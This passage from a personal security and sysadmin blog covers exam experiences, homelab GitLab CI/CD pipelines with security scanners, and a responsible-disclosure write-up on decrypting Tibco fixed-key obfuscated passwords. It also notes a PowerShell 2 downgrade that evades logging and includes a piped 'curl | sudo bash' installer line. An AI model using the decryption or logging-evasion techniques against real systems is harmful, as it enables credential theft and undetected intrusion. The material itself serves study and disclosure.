I'm curious whether I've passed! As was said: I went in without preparation and there's definitely a number of objective areas where I don't have experience. 

EDIT:

A forum acquaintance reminded me of the following:

"You see a preponderance of exam items referring the same concept because the vendor is attempting to determine which of those (experimental) items to include in the (production) exam item pool. ... When taking a beta exam, you are helping to create the exam item pool for the initial public release of the exam, not taking the initial public release of the exam itself."


kilala.nl tags: , ,

View or add comments (curr. 1)

One of my mottos in life

2021-04-06 13:21:00

Hanekawa from Bakemonogatari

2009 is a long time ago, but I recall very much enjoying "Bakemonogatari" (explained here) back then. 

One of the lines from that show that's always stuck with me is something Hanekawa says multiple times. It's kind of become my tagline in life and work.

It matches my Jill-of-all-trades, T-shaped engineering approach. ( ^_^)

"I don't know everything, I just happen to know this."


kilala.nl tags: , ,

View or add comments (curr. 0)

Finished a lot of hard work: the CDP exam, Certified DevSecOps Professional

2021-03-04 10:10:00

I know, I know: the past weeks it's been nothing but Gitlab over here :D That's going to quiet down now. How did all of that get started though?

Back in January, I posted the following question on the BHIS Discord:

"When it comes to CICD, microservices and the whole modern API reality I'm quite out of my depth. I never was a developer, can't code my way out of a wet paper bag; was always on the sysadmin and secops side. 

Are you guys aware of any trainings or bootcamps that are squarely aimed at grabbing my demography (sysadmin, secops) by the scruff of their neck and dumping them through the whole process of building a sample API, automated building and testing and then ramming it onto something like Azure of CloudFoundry? 

I've been on the sidelines of plenty CICD, helping DevOps teams with their Linux and security troubles... but now I really need to know what they do all day.

Anything commercial, that lasts multiple days and is from a reputable vendor would be absolutely great. I don't care too much about which solutions are used in said training. Key words may include: Spring.boot, Maven, Git, Azure DevOps, Github Actions, Fortify. Just an all-in-one "journey" would be lovely."

I asked around with friends and colleagues. Most folks weren't aware of any such trainings, though one pointed me at Kode Kloud, another suggested Dev Champs and two of them suggested Practical DevSecOps.

PDSO's CDP course, Certified DevSecOps Professional, listed selling points that matched what I wanted:

Having now completed the whole course and having passed the exam, here's my impressions about PDSO's CDP course:

My overall verdict, was the CDP course worth it? Yes, it was. I learned a lot, I got to mess around with a lot of cool tools and the exam was challenging.

One tip that I'd give students is to also run a CI/CD environment of their own, with more projects than the one or two in the labs. I have gained so much extra knowledge from running Gitlab in my homelab, with 6-7 vulnerable apps! It's been awesome and educational. 

A few of my fellow students asked for pointers on the exam. I wouldn't want to give anything away that's covered by the NDAs, but I can tell you this much:

Basically, be ready to do high-paced learning and studying on-the-fly. In that regards, this exam isn't too different from the OSCP pen-testing exam: the concepts are the same, but you will need to do research on the job :)

Most importantly:

  1. As John Strand always says: "Document as you go!" Take notes all the way through your work, don't put that off until the end.
  2. Clone your exam repository to your local computer and pull updates regularly! I lost 11 hours of work on my exam, because my Gitlab got reprovisioned.

kilala.nl tags: , ,

View or add comments (curr. 0)

Practical DevSecOps CDP exam: heart attack moment

2021-02-28 20:44:00

An erase git repository

Let me tell you! When you're 11.5 hours into a 12 hour exam, this is NOT a screen you want to see on your main Gitlab that holds all your exam code. ( O_o)

Thank ${Deity} I cloned it all to my local system.

To clarify that a little bit: the CDP exam I took today is a practical exam where you spend twelve hours hacking, testing and building code that manages an application infrastructure. The whole exam, like the labs during class, are "in the cloud" run by Practical DevSecOps

Around 1700, while trying to deploy a Docker container or two, my Gitlab runner became unresponsive and my Docker daemon died. Then the app webserver died. And then other students started piping up in chat that their labs were stuck.

Finally, around 1730 my Gitlab server (which holds all my exam code) was reprovisioned. That is: erased, rebuilt, re-installed. My work for the past eleven hours was gone. 

So as I said: thank ${Deity} I had cloned my git repositores to my local machine. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Quick notes: script to setup Gitlab runners and run as Ansible

2021-02-26 10:55:00

Just some quick notes I've been making on how to quickly get gitlab-runner up on a Linux box. I still feel very yucky about curl-in a file into sudo bash, so I'll probs grab the file locally instead and make sure it doesn't do anything nasty.

The following example was used on my Ansible host, to install gitlab-runner and to have it run as the local "ansible" user account instead of root. It registers and starts two runners.

curl -L "https://packages.gitlab.com/install/repositories/runner/gitlab-runner/script.rpm.sh" | sudo bash
 
export GITLAB_RUNNER_DISABLE_SKEL=true; sudo -E yum install -y gitlab-runner
 
sudo gitlab-runner uninstall
 
sudo mkdir /etc/systemd/system/gitlab-runner.service.d/
cat > /tmp/exec_start.conf << EOF
 
[Service]
ExecStart=
ExecStart=/usr/bin/gitlab-runner "run" "--working-directory" "/home/ansible/gitlab" "--config" "/etc/gitlab-runner/config.toml" "--service" "gitlab-runner" "--user" "ansible"
EOF
 
sudo mv /tmp/exec_start.conf /etc/systemd/system/gitlab-runner.service.d/exec_start.conf
 
sudo systemctl daemon-reload
sudo systemctl enable gitlab-runner
sudo systemctl start gitlab-runner
 
sudo cp /tmp/broehaha-cachain.pem /etc/gitlab-runner/cachain.pem
 
read -p "gitlab reg token: " GITLAB_TOKEN
 
sudo gitlab-runner register --non-interactive
--tls-ca-file=/etc/gitlab-runner/cachain.pem
--tag-list ansible
--name ansible.corp.broehaha.nl
--registration-token ${GITLAB_TOKEN}
--url https://gitlab.corp.broehaha.nl
--executor shell
--locked=false
 
sudo gitlab-runner register --non-interactive
--tls-ca-file=/etc/gitlab-runner/cachain.pem
--tag-list ansible
--name ansible.corp.broehaha.nl
--registration-token ${GITLAB_TOKEN}
--url https://gitlab.corp.broehaha.nl
--executor shell
--locked=false

kilala.nl tags: , ,

View or add comments (curr. 0)

Over-doing it? Maybe... Almost time to chill a bit.

2021-02-20 17:13:00

Heh, it's a bit ironic, no? Six weeks ago I wondered whether I was over-doing it, with work and my studies. I'd just finished a few course and two exams and was about to start with a new client. 

Not two weeks later I've taken another two classes and I'm about to take another exam. A twelve hour, practical exam followed by documentation and reporting. 

I've promised myself that, once I'm done with the exam, I'll spend a few weeks on nothing but gaming! Genshin Impact here I come! :)

EDIT:

Ah. I just realized: I start teaching class again in 6-8 weeks. That'll require prep-time too :D


kilala.nl tags: , ,

View or add comments (curr. 0)

Security testing OWASP Juice Shop in Gitlab CI/CD

2021-02-20 16:10:00

Gitlab pipeline

After finishing the awesome BHIS "Modern Webapp Pen-testing" class (January), I immediately rolled into the "Certified DevSecOps Professional" course. I am lacking in experience with CI/CD, while having to support DevOps engineers every day.

The CDP labs by Practical SecDevOps are okay, but only testing Django.NV got stale.

What better way to learn about SAST, DAST, SCA and more than by running our beloved Juice Shop webapp through my own CI/CD pipeline?! :D 

Not only does this give me a private Juice Shop in a safe environment (my homelab), but it got me more familiar with Gitlab and all the things that come with DevSecOps / SecDevOps / Security in DevOps / however you wanna call it. 

The image above shows the Juice Shop project in my Gitlab, with its security testing and deployment stages. The last "Compliance" stage (with Inspec) didn't fit into the pic.

Running the pipeline builds a Docker image for Juice Shop, runs SAST, SCA, secret scanning and linters, then runs the Docker image on my testbox and runs Nikto, ZAP and SSLyze against it as DAST. All very much default/basic, but it's a start!


kilala.nl tags: , ,

View or add comments (curr. 0)

Practical DevSecOps and their CDP training

2021-02-19 07:42:00

I've been mentioning Gitlab for a while now and you might wonder why the sudden change. :D I'm working my way through the CDP training from Practical DevSecOps.

I needed a crash course that took me through a practical example of CI/CD pipelines, from A to Z, in a hurry. I'm in security and I need to advise DevOps engineers who work on those pipelines every day. I found it harder and harder to relate to them without having gone through their journey myself. Intellectually I understood most of the concepts, but everything stayed very vauge without me actually doing it hands-on.

So far the course is a resounding "okay". It's not wonderful, it's not bad, it's just that: pretty good. The slide decks are decent, the trainer narrating the videos has a nice voice, but the narration is quite literally reading from the text book. Some of the text on slides and in the labs was lifted directly from third party sources such as projects' Github pages or from articles like Annie Hedgpeth's series on running Inspec

They have a huge amount of online labs, which is good, even if they get repetitive. So what I've done is setup Gitlab in my homelab as well, and apply all the things the course teaches me to multiple intentionally-vulnerable web apps.

So I've got Git repos for Juice Shop (Node.JS and Angular), django.nv (Python and JS), Webgoat (Java), GoVWA (Go) and others, which I'm treating like they were projects for my simulated company. Each of these gets its own CI/CD pipeline to run code quality checks, SAST, DAST and automated build + deploy through Docker.

It's been one heck of a learning experience and I'm looking forward to the closing exam, which is another 24h practical exam. I love those!


kilala.nl tags: , ,

View or add comments (curr. 0)

Gitlab runner "shell" executor cannot upload artifacts

2021-02-17 20:30:00

When using a "shell" executor with gitlab-runner you may run into the following errors, when trying to upload artifacts to Gitlab.

ERROR: Uploading artifacts as "archive" to coordinator... error error=couldn't execute POST against https://gitlab.corp.broehaha.nl/api/v4/jobs/847/artifacts?artifact_format=zip&artifact_type=archive: Post https://gitlab.corp.broehaha.nl/api/v4/jobs/847/artifacts?artifact_format=zip&artifact_type=archive: proxyconnect tcp: tls: first record does not look like a TLS handshake

The issue here is that your "gitlab-runner" user account has picked up a http proxy configuration that's not sitting well with it.

In my homelab, the proxy settings are configured for all users using Ansible, through "/etc/profile". For the "gitlab-runner" user that apparently may be problematic when trying to talk to the internal Gitlab server. Quick and dirty work-around: unset the proxy settings from your environment.

echo "unset http_proxy; unset https_proxy" >> ~/.bashrc
echo "unset http_proxy; unset https_proxy" >> ~/.profile

kilala.nl tags: , ,

View or add comments (curr. 0)

Challenges running "owasp/zap2docker-stable" without docker:dind

2021-02-17 19:35:00

As part of the CDP course we're running unattended ZAP scans as part of integration testing, using the "owasp/zap2docker-stable" Docker container. The course materials tell you to run the CI/CD task using "docker:dind", a Docker-in-Docker solution. For some reason my Docker boxen aren't a fan of that; I'll have to debug that later.

Trying to run the ZAP container with a simple "shell" executor through gitlab-runner led to some fun challenges though! The course material suggests the following Docker run command:

docker run --user $(id -u):$(id -g) -w /zap -v $(pwd):/zap/wrk:rw --rm owasp/zap2docker-stable zap-baseline.py -t https://target:port -J zap-output.json

To sum it up: start the ZAP container, run the ZAP baseline script using your current UID and GID, mount your local directory as /zap/wrk and then write the results as a JSON file onto the mounted local directory.

This approach fails in two ways if you're not doing the fastest, dirty approach: running as the "root" user account.

Either you use it with "--user $(id -u):$(id -g)" and then you get the error message "Failed to start ZAP :(". Or you run it without that setting, then ZAP runs but it cannot save the output file, with a "permission denied: /zap/wrk/zap-output.json" message.

The issue here is that container has a very limited setup of users (as it should) and your uid+gid are most likely not in there. Under normal conditions, the ZAP scripts inside the container run as "zap:1000:1000" but that user doesn't have write access to your user's directory on the Docker host.

So... If you're running the ZAP container directly on your host and not as DinD, then you'll need to setup a temporary directory and setup write access for either uid:1000 or gid:1000 to it. The latter feels "better" to me. Then we'll end up with this (assuming Gitlab):

zap-baseline:
    stage: integration
    dependencies: []
    allow_failure: true
    tags:
        - shell
    before_script:
        - docker pull owasp/zap2docker-stable
        - mkdir output; chgrp -f 1000 output; chmod 770 output; cd output
    script: 
        - docker run --rm -v $(pwd):/zap/wrk owasp/zap2docker-stable zap-baseline.py -t http://target:port -J zap-output.json
    artifacts:
        paths: [output/zap-output.json]
        when: always

kilala.nl tags: , ,

View or add comments (curr. 0)

WTF Apple? QA oversight with Big Sur bricks your device

2021-02-13 21:31:00

Whelp that's just wonderful. 

A QA oversight in Apple's Big Sur updater may lead to your system getting stuck in an endless loop. Worse, if your disk is encrypted using File Vault, you're quite completely hosed. Excellent explanation over here by Mr Macintosh.

Yet again this is a reminder to Always Make Backups!!!

So what's this little mixup Apple made in their quality assurance? The Big Sur updater does not check that it has enough storage space available on your Mac to complete the OS installation. Depending on how much space you have it will either start but refuse to complete the install, or it will start and fail to complete the install. In the latter case, you're in trouble. 

With two of our Macbooks Air the install went fine, but Marli's MBA was the smaller 128GB SSD model. With 39GB free space things went tits-up. Thank ${Deity} that we hadn't enabled File Vault on this one. 

Now I can at least boot into recovery mode. Disk Utility refuses to properly image the internal storage to a USB drive, but at least dd still works. Man, this is not how I expected my Saturday evening to go. ( ; =_=)


kilala.nl tags: , ,

View or add comments (curr. 0)

Practical DevSecOps: CDP labs example pipeline

2021-02-07 22:08:00

A pipeline in Gitlab

I'll talk about it in more detail at a later point in time, but I'm about a week's worth into the Certified DevSecOps Professional training by Practical DevSecOps. So far my impressions are moderately positive, more about that later. 

In the labs we'll go through a whole bunch of exercises, applying a multitude of security tests to a Gitlab repository with a vulnerable application. Most of the labs involve nVisium's sample webapp django.nV.

Having reached the half-way point after that one week, I had not encountered two crucial parts of the DevOps / CICD pipeline which I'm not at all familiar with. We're applying all kinds of tests, but we never did the steps you'd expect before or after: creating the artifacts, deploying and running them. As I've said before, I'm #NotACoder.

Instead of focusing on one of the next chapters, today I spent all day improving my Gitlab and Docker install by applying all the required trusts and TLS certificates. This, in the end, enabled me to create, push, pull and run a Docker image with the django.nV web app. 

If anyone's interested: here's my Dockerfile and gitlab-ci.yml that I'd used in my homelab. You cannot just throw them into your own env, without at least changing username, passwords and URLs. You'll of course also need a Docker host with a gitlab-runner for deployment.

Note: The Docker deploy and execute steps show a bad practice, hard-coded credentials in a pipeline configuration. Ideally this challenge should be solved with variables or even better: integration with a vault like Azure Vault, PasswordState or CyberArk PasswordVault. For now, since this is my homelab, I'll leave them in there as a test for Trufflehog and the other scanners ;)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Integrating Gitlab into your lab with private PKI

2021-02-07 19:45:00

My homelab runs its own PKI and most servers and services are provided with correct and trusted certificates. It's a matter of discipline and of testing as close to production as possible. 

Getting Gitlab on board is a fairly okay process, but takes a bit to figure out. 

So my quick and dirty way of getting things set up:

  1. On ADCS generate a new, exportable key pair with the right settings. 
  2. Run this keypair through a locally created .inf request file with an extension for the subject alt. name (see example).
  3. Issue the requested cert and import it.
  4. Export the full keypair plus cert as a PKCS12 / .pfx file.
  5. Transfer the .pfx to the Gitlab server and store safely in "/etc/gitlab/ssl/". Set to ownership by root, and only readable by root. 
  6. Use "openssl" to extract the private key and certificate from the .pfx file. Then use it as well to decrypt the private key. 
  7. Replace the pre-existing gitlabhostname.crt and gitlabhostname.key files with the newly extracted files.

Now, you also want Gitlab and your runners to trust your internal PKI! So you will need to ask your PKI admin (myself in this case) for the CA certificate chain. You will also need the individual certificates for the root and intermediary PKI servers. 

  1. In your Gitlab host, copy the individual PKI certificates into "/etc/gitlab/trusted-certs". 
  2. On your Gitlab runner hosts, copy the CA chain into "/etc/gitlab-runner" and reconfigure "/etc/gitlab-runner/config.toml" so each runner has a line for "tls-ca-file". 
  3. If you haven't done so already, make sure the rest of your Linux host also trusts your PKI by importing the certs.
  4. According to the Docker manuals, Docker uses both its own config file and the Linux/Windows central trust store. So completing step #3 is good enough. But, Docker will only pick up new certs after you restart the engine!

Don't forget to restart Gitlab itself, the runners and Docker after making these config changes!

You can then perform the following tests, to make sure everything's up and running with the right certs.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Debugging: Trufflehog reports no secrets in Gitlab CICD

2021-02-06 21:59:00

Durning the CDP class, one of the tools that gets discussed is Trufflehog. TLDR: yet another secrets scanner, this one built in Python. 

I ran into an odd situation running Trufflehog on my internal Gitlab CICD pipelines: despite running it against the intentionally vulnerable project Django.nv, it would come back with exit code 0 and no output at all. 

Why is this odd? Because it would report a large list of findings:

But whenever I let Gitlab do it all automated, it would always come up blank. So strange! All the troubleshooting I did confirmed that it should have worked: the files were all there, the location was recognized as a Git repository, Trufflehog itself runs perfectly. But it just wouldn't go...

I still don't know why it's not working, but I did find a filthy workaround:

trufflehog:
  stage: build
  allow_failure: true
  image: python:latest
  before_script:
    - pip3 install trufflehog
    - git branch trufflehog
  script:
    - trufflehog --branch trufflehog --json . | tee trufflehog-output.json
  artifacts:
    paths: [ "trufflehog-output.json" ]
    when: always

If I first make a new branch and then hard-force Trufflehog to look at that branch locally, it will work as expected. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Gitlab-runner not picking up jobs after reboot

2021-02-06 19:35:00

As part of my studying for the CDP course, I've expanded my homelab with a private instance of Gitlab. I've got to say: I like it! A lot. It's good software! 

To accomodate my builds I expanded the RAM on my Docker host VM and set up three "gitlab-runners" to pick up jobs from Gitlab CICD pipelines. Microsoft's documentation is outstanding: the runners were installed and configured within minutes.

The only thing I really disliked was their instructions to "wget https://some-url | bash -". That always feels so fscking scary. 

As part of my change management process the Docker host of course needed a reboot, to see if things some up correctly. They did and the "gitlab-runner" process was there as well. But it wasn't picking up any jobs! Only when I SSHd into the host and ran "sudo gitlab-runner run" would jobs start flowing. 

At first I thought I just didn't understand the concept of the runner process well enough. Maybe I hadn't set them up correctly? Then I decided to do the logical thing: check the logs. I've been teaching my students to do so, so why didn't I? :D

"sudo systemctl status gitlab-runner -l" showed me the following:

$ sudo systemctl status gitlab-runner -l
● gitlab-runner.service - GitLab Runner
   Loaded: loaded 
   Active: active 

...
Feb 06 19:24:37  gitlab-runner[20361]: WARNING: Checking for jobs... failed
runner=REDACTED status=couldn't execute POST against https://REDACTED/api/v4/jobs/request: 
Post https://REDACTED/api/v4/jobs/request: x509: certificate signed by unknown authority

The self-signed cert isn't too surprising, since I still have a backlog item to get that fixed. I wanted to first get the basics right before getting a proper cert from my PKI. But I thought I had dealt with that by registering the runner with a CA cert override. 

Checking "/etc/gitlab-runner/config.toml" showed me where I had gone wrong: the CA cert override path was relative, not exact.

[[runners]]
  name = "REDACTED"
  url = "https://REDACTED"
  token = "REDACTED"
  tls-ca-file = "./gitlab.pem"
  executor = "docker"

I had assumed that the cert would be picked up by the runner config and stored elsewhere, instead of being referenced from the file system. Wrong! I made sure to copy the self-signed cert to "/etc/gitlab-runner/gitlab.pem" after which I corrected the "config.toml" file to use the correct path. 

One quick restart of the runner service and now jobs are automatically picked up!


kilala.nl tags: , , ,

View or add comments (curr. 3)

Updating my pen-testing experience: "Modern Webapp Pen-testing" by BHIS and WWHF

2021-01-29 16:14:00

I've been dabbling in pen-testing for a few years now; it's never been my main gig and I wonder whether it'll ever be. For now it's a wonderful challenge which makes its way into my work assignments. 

Case in point: at my new customer I'll be performing pen-tests on contemporary applications and services. Java backends, Javascript frontends and lots of APIs! It's in that area that I feel I need additional development: I've learned and practiced with a lot of vulnerabilities and software stacks, but not these. 

Which is why I yet again turned to Black Hills InfoSec and WWHF, for another training! This time around, it's "Modern webapp pen-testing with B.B. King".

Where the "Applied Purple Teaming" class I recently took was okay, B.B.'s class was excellent! All the labs use OWASP's Juice Shop project, which combines NodeJS on the backend (with REST APIs!) with AngularJS on the frontend. Throw in MongoDB for some NoSQL and you've got a party going!

All in all, B.B.'s teaching style is great and his interactions with us students were pure gold. In general, the Discord chat was lively and had great contributions from people all over the world. I'd highly recommend this class! I'll defo learn more with Juice Shop and other vulnerable apps in the upcoming months. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Teaching software vulnerabilities: OWASP SKF Labs

2021-01-28 15:42:00

At one of my previous clients, we taught developers and engineers about a number of common software vulnerabilities through an in-house course. The training makes use of labs provided by OWASP's SKF Labs project

The SKF Labs offer dozens of Dockerized mini-webapps, each of them purpose built to demo one type of vulnerability. They're the exact inverse of demo apps like Juice Shop or DVWA, which combine many different vulns into one webapp. 

The Dockerized apps make it easy to teach a small set of vulns to students: all they need is Docker and a way to pull in the public containers. 

After teaching with these labs, I also wanted to contribute! There were two specific vulnerability types that I wanted to include in our teaching:

Building the first of those apps was easy: just clone one of the existing Dockerized apps and adjust where needed.

The second one was an absolute blast to build, because it forced me to learn new things! I had to practice my Python, I got started with TCP/IP packet crafting in Scapy and I got to learn NetFilter plugins! I learned a lot from a similar project by Ludovic Barman

The TLS downgrade demo is something I'm pretty darn proud of! I learned how to build a Python script which performs a man-in-the-middle attack on TLS, through the abuse of NetFilter plugins and by tweaking TLS packets using Scapy! What a rush!


kilala.nl tags: ,

View or add comments (curr. 0)

"Applied Purple Teaming" training, by BHIS and Defensive Origins

2021-01-08 15:19:00

I fear that I may have been over-doing it a little bit the past few weeks. 

December 21st was my last day at my previous assignment, with my new assignment starting January 11th. The three weeks inbetween were spent on the holidays and on studying. I pushed through:

The latter two are both advertised as 16 hour trainings, but I've easily spent upwards of 20-25 hours on each to go through the labs and to research side quests. A few hours more on improvements to the labs for the latter, since I ran into many problems with their Terraforming scripts for Azure Cloud. Huzzah for cooperation through Github. 

While I found the APT class very educational, I can't shake the feeling that it could have been better. In some cases K&J skipped through a number of topics relatively quickly, as "these are basics, etc" and at some points there was rapid back-and-forth between slides. Granted, I did watch the VoD-recordings of their July session and I expect their more recent classes to have been more fluent. 

Thanks to K&J's class my todo list has grown tremendously. Between trainings and certifications added to my wishlist, I've also added a number of improvements that I would like to apply to my homelab. First and foremost: right-sizing my network segments and properly applying all local firewalls. This is a best-practice that will hinder lateral movement in simulations or real-world scenarios.


kilala.nl tags: , ,

View or add comments (curr. 0)

Powershell auditing: easy bypasses

2021-01-05 15:44:00

While I'm making my way through lab L1120 of BHIS' "Applied Purple Teaming" course, I noticed something interesting: none of my nefarious commands were showing up in HELK, despite me having enabled Powershell logging through a GPO.

In this lab, we're grabbing Sharphound.ps1 from the Bloodhound project, and either download and run it, or just load it into memory using Invoke-Expression. But none of that stuff was showing up in my Kibana dashboard, despite a "whoami" run from Powershell appearing correctly.

That's when I learned that A) downgrading your session to Powershell 2 kills all your logging, B) most of what you run in Powershell ISE (a script editor) is flat-out never logged. In my case: I make it a habit to work inside ISE, because I can easily edit script blocks.

See also this excellent blog post from 2018.

Luckily you can disable Powershell 2 with a GPO (which could end up breaking older scripts). But with regards to ISE: you'll have to completely uninstall, or deny-list it... if possible.

EDIT:

Based on this article by Microsoft themselves, it seems that turning on transcription will also work on Powershell ISE. I'll need to investigate a bit deeper... See if I haven't misconfigured my setup.

EDIT 2:

Yeah. The Powershell 2 logging bypass is valid, but the lack of logging through Powershell ISE was a case of #PEBCAK. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed AZ-900; experiences with OnVue exam at home

2021-01-02 14:48:00

It's nice when sidetracks during learning lead to measurable results. Case in point: while setting up the labs for the BHIS "Applied PurpleTeaming" training, I needed to quickly learn about Azure Cloud. ... And now I've passed the AZ-900 exam! :D

Microsoft offers (most of) their exams to take at-home remotely, through Pearson Vue's "OnVue" service. I already worked with OnVue back in August, when taking the Cloud+ beta exam. My experience this time around was very similar: the tooling works well, as long as you make sure to turn off your local outbound firewall like Little Snitch

As to the AZ-900 exam: it was a nice motivator (the proverbial carrot on the stick) for me to go through the six Azure Fundamentals modules on Microsoft Learn. I'm happy to have finally gotten some hands-on experience with Azure Cloud, or basically any cloud provider beyond running a shortlived VM on AWS.

After completing the BHIS APT training I intend to play around with Azure a bit more... Maybe I'll even rebuild this website on there!


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed RedHat EX407V27K, experiences with remote Kiosk exams

2020-12-23 23:06:00

As I mentioned earlier this week, I've been studying for RedHat's EX407 exam. Looking back at my CPE records / bookkeeping I've been at it an embarassingly long time: I started studying back in March of 2019. Almost two years ago! Just too many fun and interesting things kept coming in the way!

Between teaching Linux+ to a group of students, with passing CTT+, Linux+, CySA+ and CRTP, as well as classes on DFIR and PKI it was just tooooo tempting! And Ansible was just a little too boring! So as I said before: "booo!" to my lack of discipline! Dragging my feet on EX407 caused me to almost lose my RHCSA/RHCE certifications, because they needed to be renewed. 

But enough about that! Let's talk some interesting points!

All those study materials I linked to, especially Tomas' practice exam, proved to be absolute gold. Without them I wouldn't have passed, because pass I did! Out of a max of 300 (I think?) and with a passing grade of 210 I scored 239 points.

I dropped points mostly due to inexperience with Jinja2 templating and its logic (tests, loops) and with Ansible Galaxy and requirements-files. Out of 16 tasks I knew up front that I'd fail 3 of them because I couldn't get the playbooks to work correctly. Lessons learned and I'll definitely try to practice more in my homelab!

Finally, after being one of the first 100 people to take a Red Hat Kiosk exam, I'll also weigh in on Red Hat's remote, at-home exams. RH had fallen behind to its competitors in that regard, still forcing students to come in to testing centers. What with Covid-19, that strategy needed to change, fast. So they did, in September of this year.

All in all I very much appreciate Red Hat's remote, at-home testing. To sum it up: you flash a RH-provided Linux image to a USB drive, plug that into your PC and boot it up. This turns your private PC into a RH Kiosk system, exactly like they use in their official testing centers! The only vexing part of the setup is that you need TWO functioning web cams, one of which MUST be cabled and pointed at you from the side. 

Overall, the bootable Kiosk Linux is great. It provides pre-exam setup testing to ensure you can actually take the exam. From there on out things work exactly like, or actually better than, the Kiosk at the testing center. Testing from home is absolutely great! After my bad experiences with EX413 I'd been turned off of RH's exams, but this has turned me around a bit. 

I'm happy to have passed EX407! Time to go over my plan for the next few months! I have a few pen-testing classes lined up and will also need to prepare for teaching my next group of students!


kilala.nl tags: , ,

View or add comments (curr. 0)

RedHat EX407 / EX294 study materials

2020-12-17 08:39:00

I've been studying on and off for the EX407 Ansible exam for ... lemme check... 1.8 years now. Started in March of 2019, hoping to renew my RHCE in time, but then I kept on getting distracted. Two certs and three other studies further, I still need to pass EX407 to renew my RHCE. Way to go on that discipline! ( ; ^_^)

Anywho, there's a few resources that proved to be helpful along the way; thought I'd share them here. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Exploit: Tibco password decryption

2020-12-08 14:11:00

The following article is an exploit write-up which I published on my Github repository. It describes a security vulnerability I found in Tibco's software, which I submitted to the vendor through proper responsible disclosure. Now that Tibco have finished their follow-up, I am allowed to publish my findings.

 

Introduction

During a pen-test of an internally developed application, I discovered that the engineers in question had re-used a commercial Java library for password obfuscation.

While their application was not part of a Tibco stack, nor did it use Tibco, they did make use of Tibco's "ObfuscationEngine". On Tibco systems, this tool is used to obfuscate (and sometimes encrypt) passwords for safe storage in configuration files.

 

Update: previous works

My colleague Wouter R. referred me to a project from a few years ago, which apparently did the exact same attack: Thomas D's "tibcopasswordrevealer", built in Python. At the time of my pentest, nor up until an hour ago, was I aware of this previous work. Until my colleague pointed out the project, I had only found people re-using the "tibcrypt.jar" library.

 

Background

Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:

Source, the documentation.

This write-up pertains to #3 above. The documentation states both:

"The fixed key […] does not provide the same level of security as the use of a machine key or a custom encryption key. It is used to encrypt an administration domain’s password.”

and

"Passwords encrypted using Obfuscate Utility cannot be decrypted. Ownership is with customers to remember passwords in clear text. There is no utility provided by TIBCO to decrypt passwords encrypted using Obfuscate Utility.”.

 

Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!.

For example:

#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA

 

Issues

The first statement does not make clear the risks that are involved, while the second statement is blatantly incorrect.

On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key.

For example:

I performed a pen-test on an application, where the above-mentioned ObfuscationEngine had made its way into their in-house code. Because I did not have access to Tibco's copyrighted libraries, I was happy to find one source online that had the older “tibcrypt.jar” available.

-> https://mvnrepository.com/artifact/tibco-ems/tibcrypt/4.1

 

By analyzing this JAR file, I recovered the fixed key. Using that I wrote a small Java utility that can decrypt any secret that was encrypted using the Tibco fixed key regardless whether Tibco libraries are available.

The code is provided in my Github repository as “decrypt.java”.

 

Impact

Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does not require access to Tibco software or libraries.

All you need are exfiltrated secret strings that start with the characters #!.

This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software.

 

Instructions

Compile with:

	javac decrypt.java

 

Examples of running, with secrets retrieved from websites and forums:

	java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
	7474	

	java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
	tibco

Outcome

I have shared my findings internally with my client. I have advised them to A) stop including Tibco's copyrighted classes and libraries into their own Java applications, B) replace all secrets encrypted using this method, as they should be considered compromised.

The proof of concept code has been shared with the customer as part of the pen-test report.

I reported this situation to Tibco's responsible disclosure team (security@tibco.com) on September 9th 2020.

On December 8th Tibco's security team responded that they have updated the Tibco administrators documentation to make it clear that the fixed key method of ObfuscationEngine should not be considered secure.

-> https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=3

 

The text now reads:

"The fixed key is compatible with earlier versions of TIBCO Runtime Agent but should not be treated as secure. A machine key or custom encryption key should be used whenever possible."

 

CVE / Vulnerability information

No CVE was awarded as the vendor did not recognize this as a vulnerability. This is intended functionality, which "works as designed".


kilala.nl tags: ,

View or add comments (curr. 1)

Using the 3XC soft-phone through RDP (Linux and Windows)

2020-12-05 22:59:00

In order to simulate a "work-from-home" (WFH) situation in the lab, I'm very happy to test the 3CX web client. Their webapp supports a lot of the productivity features you'd expect and works with a browser extension (Edge and Chrome) to make actual calls. No need to install a soft-phone application, just grab the browser extension!

The RDP protocol supports the redirection of various types of hardware, including audio input and output. This requires that you enable this for your target host (or in general), for example in Royal TSX you would edit the RDP connection, go to Properties > Redirection and put a check in the box for Record audio from this computer. Also select Bring audio to this computer.

With a Windows target host it'll now work without a hassle.

Linux is a different story, but that's because the xRDP daemon needs a little massaging. Specifically, you will need to build a module or two extra for PulsaAudio. This isn't something you can easily "apt install", but the steps are simple enough. Full documentation over here.

After building and installing the modules, you'll need to logout and log back in. After that playing audio works and PulseAudio will have detected your system's microphone as well. 


kilala.nl tags: , ,

View or add comments (curr. 0)

State of the homelab: December 2020

2020-12-05 16:15:00

a map of the network

It's been a busy year! Between adding new hardware, working with Ansible and messing with forensics and VOIP, the lab has evolved. I'm very lucky to have all of this at my disposal and I'm grateful to everybody's who's helped me get where I am today. :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Running a VOIP/SIP homelab with 3CX (free) PBX

2020-12-05 15:25:00

the admin panel and phone app

Just yesterday, a lucrative dumpster dive netted me two brandnew IP desk phones, very spiffy Grandstream GPX2130 models. Because studying for my upcoming Ansible exam isn't much fun (OMG two weeks!!), procrastination struck!

Let's add VOIP to my simulated company Broehaha in my homelab!

Until this weekend I had zero experience with VOIP, SIP and the likes beyond using Cisco phones as an end-user. I'd heard plenty of colleagues talk about Asterisk and I remember hacking an Asterisk server in the PWK labs at Offensive Security, but that's about as far as my exposure went. 

